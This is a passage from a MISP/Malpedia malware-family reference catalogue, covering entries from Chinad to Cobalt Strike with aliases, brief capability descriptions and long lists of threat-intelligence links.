https://www.secureworks.com/research/threat-profiles/bronze-president
https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day
https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html
https://twitter.com/ESETresearch/status/1366862946488451088
https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://redcanary.com/blog/microsoft-exchange-attacks
https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders
https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks
https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers
https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf
https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968
https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits
https://attack.mitre.org/software/S0020/
https://blog.joshlemon.com.au/hafnium-exchange-attacks/
https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf
https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html
https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/
https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/
https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf
https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html
https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—a-ransomware—and-a-botnet-join-the-part.html
https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html
https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/
https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection
https://us-cert.cisa.gov/ncas/alerts/aa20-259a
https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/
https://us-cert.cisa.gov/ncas/alerts/aa20-275a
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf
https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/
https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers
https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a
https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/

Chinad

Adware that shows advertisements using plugin techniques for popular browsers

The tag is: misp-galaxy:malpedia="Chinad"

Chinad is also known as:

Table 1573. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad

ChinaJm

Ransomware.

The tag is: misp-galaxy:malpedia="ChinaJm"

ChinaJm is also known as:

Table 1574. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm
https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html

Chinoxy

The tag is: misp-galaxy:malpedia="Chinoxy"

Chinoxy is also known as:

Table 1575. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy
https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02
https://nao-sec.org/2021/01/royal-road-redive.html
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf
https://community.riskiq.com/article/56fa1b2f
https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746
https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf
https://community.riskiq.com/article/5fe2da7f

Chir

The tag is: misp-galaxy:malpedia="Chir"

Chir is also known as:

Table 1576. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chir

Chthonic

The tag is: misp-galaxy:malpedia="Chthonic"

Chthonic is also known as:

AndroKINS

Table 1577. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic
https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://securelist.com/chthonic-a-new-modification-of-zeus/68176/
https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html

cifty

The tag is: misp-galaxy:malpedia="cifty"

cifty is also known as:

Table 1578. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty
http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html

Cinobi

The tag is: misp-galaxy:malpedia="Cinobi"

Cinobi is also known as:

Table 1579. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi
http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html
https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf
https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/

Citadel

The tag is: misp-galaxy:malpedia="Citadel"

Citadel is also known as:

Table 1580. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel
https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf
http://www.xylibox.com/2016/02/citadel-0011-atmos.html
https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
http://blog.jpcert.or.jp/2016/02/banking-trojan—27d6.html
https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/

Clambling

Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.

The tag is: misp-galaxy:malpedia="Clambling"

Clambling is also known as:

Table 1581. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling
https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf
https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/
https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf

CLASSFON

The tag is: misp-galaxy:malpedia="CLASSFON"

CLASSFON is also known as:

Table 1582. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon
https://content.fireeye.com/apt-41/rpt-apt41/

CLEANTOAD

CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.

The tag is: misp-galaxy:malpedia="CLEANTOAD"

CLEANTOAD is also known as:

Table 1583. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf

Client Maximus

The tag is: misp-galaxy:malpedia="Client Maximus"

Client Maximus is also known as:

Table 1584. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus
https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/

ClipBanker

The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.

The tag is: misp-galaxy:malpedia="ClipBanker"

ClipBanker is also known as:

Table 1585. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/
https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

Clop

Clop is a ransomware which uses the .clop extension after having encrypted the victim’s files. Another unique characteristic belonging with Clop is in the string: "Dont Worry C|0P" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.

The tag is: misp-galaxy:malpedia="Clop"

Clop is also known as:

Table 1586. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.clop
https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html
https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html
https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever
https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/
https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/
https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f
https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/
https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824
https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/
https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/
https://github.com/Tera0017/TAFOF-Unpacker
https://asec.ahnlab.com/en/19542/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/
https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/
https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2[https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2]
https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://www.youtube.com/watch?v=PqGaZgepNTE
https://www.secureworks.com/research/threat-profiles/gold-tahoe
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672
https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546
https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/
https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/
https://twitter.com/darb0ng/status/1338692764121251840
https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26
https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/
https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf
https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/
https://unit42.paloaltonetworks.com/clop-ransomware/

CloudEyE

CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.

The tag is: misp-galaxy:malpedia="CloudEyE"

CloudEyE is also known as:

GuLoader
vbdropper

Table 1587. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195
https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader
https://labs.vipre.com/unloading-the-guloader/
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/
https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html
https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/
https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/
https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/
https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728
https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/
https://twitter.com/VK_Intel/status/1255537954304524288
https://twitter.com/TheEnergyStory/status/1239110192060608513
https://twitter.com/VK_Intel/status/1252678206852907011
https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland
https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/
https://twitter.com/sysopfb/status/1258809373159305216
https://research.checkpoint.com/2020/guloader-cloudeye/
https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update
https://www.joesecurity.org/blog/3535317197858305930
https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services
https://twitter.com/VK_Intel/status/1257206565146370050
https://www.youtube.com/watch?v=-FxyzuRv6Wg
https://blog.morphisec.com/guloader-the-rat-downloader
https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/
https://twitter.com/TheEnergyStory/status/1240608893610459138
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4
https://www.youtube.com/watch?v=K3Yxu_9OUxU
https://www.crowdstrike.com/blog/guloader-malware-analysis/
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/
https://malwation.com/malware-config-extraction-diaries-1-guloader/
https://www.youtube.com/watch?v=N0wAh26wShE
https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/
https://labs.k7computing.com/?p=20156
https://labs.k7computing.com/?p=21725Lokesh

Cloud Duke

The tag is: misp-galaxy:malpedia="Cloud Duke"

Cloud Duke is also known as:

Table 1588. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke
https://www.f-secure.com/weblog/archives/00002822.html

CMSBrute

The tag is: misp-galaxy:malpedia="CMSBrute"

CMSBrute is also known as:

Table 1589. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute
https://securelist.com/the-shade-encryptor-a-double-threat/72087/

CMSTAR

The tag is: misp-galaxy:malpedia="CMSTAR"

CMSTAR is also known as:

meciv

Table 1590. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar
https://twitter.com/ClearskySec/status/963829930776723461
https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan
https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/

CoalaBot

The tag is: misp-galaxy:malpedia="CoalaBot"

CoalaBot is also known as:

Table 1591. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot
https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html

Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

The tag is: misp-galaxy:malpedia="Cobalt Strike"

Cobalt Strike is also known as:

Agentemis
BEACON
CobaltStrike

Table 1592. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/
https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims
https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py
https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html
https://www.secureworks.com/research/threat-profiles/bronze-president
https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf
https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf
https://www.sans.org/webcasts/contrarian-view-solarwinds-119515
https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike
https://github.com/sophos-cybersecurity/solarwinds-threathunt
https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware
https://twitter.com/AltShiftPrtScn/status/1385103712918642688
https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf
https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://quake.360.cn/quake//reportDetail?id=5fc6fedd191038c3b25c4950[https://quake.360.cn/quake//reportDetail?id=5fc6fedd191038c3b25c4950]
https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b
https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/
https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/
https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/
https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure
https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/
https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought
https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/
https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/
https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/
https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/
https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c
http://www.secureworks.com/research/threat-profiles/gold-drake
https://blog.talosintelligence.com/2021/05/ctir-case-study.html
https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/
https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7
https://www.ic3.gov/Media/News/2021/210823.pdf
https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20
https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/
https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf
https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/
https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/
https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one
https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/
https://securelist.com/apt-luminousmoth/103332/
https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/
https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/
https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike
https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/
https://www.secureworks.com/research/threat-profiles/gold-dupont
https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://www.qurium.org/alerts/targeted-malware-against-crph/
https://pylos.co/2018/11/18/cozybear-in-from-the-cold/
https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/
https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf
https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
https://twitter.com/MBThreatIntel/status/1412518446013812737
https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html
https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/
https://www.cynet.com/understanding-squirrelwaffle/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang
https://thedfirreport.com/2021/01/31/bazar-no-ryuk/
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://twitter.com/vikas891/status/1385306823662587905
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://malwarebookreports.com/cryptone-cobalt-strike/
https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/
https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
